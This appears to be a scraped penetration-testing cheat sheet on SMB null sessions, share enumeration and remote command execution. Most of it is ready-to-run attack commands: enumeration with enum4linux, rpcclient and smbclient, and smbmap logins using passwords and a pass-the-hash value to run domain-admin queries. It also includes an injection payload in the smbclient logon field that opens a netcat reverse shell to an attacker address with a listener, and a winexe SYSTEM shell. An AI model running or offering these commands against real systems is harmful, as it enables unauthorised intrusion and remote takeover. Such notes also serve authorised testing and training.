SMB Enumeration and recon notes.
SMB null sessions are unauthenticated sessions against smb shares, and anonymous access to hidden shares is available.
Connect and Enumerate Shares
|
1 2 3 4 5 6 |
nmblookup -A $IP enum4linux -a $IP rpcclient -U "" $IP |
smbclient
|
1 2 3 4 5 6 7 8 9 10 |
smbclient -L $IP smbclient //$IP/tmp smbclient \\\\$IP\\ipc$ -U john smbclient //$IP/ipc$ -U john smbclient //$IP/admin$ -U john |
smbmap
|
1 2 3 4 5 6 7 |
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain' |
Command Execution via smbclient
|
1 2 3 4 |
smbclient //10.10.10.3/tmp logon “/=`nc 10.10.2.17 1233 -e /bin/bash`” |
Start nc listener from attacker:
nc -lnvp 1233
Get shell over smb with winexe
|
1 2 |
winexe -U username //$IP "cmd.exe" --system |
SMB Enumeration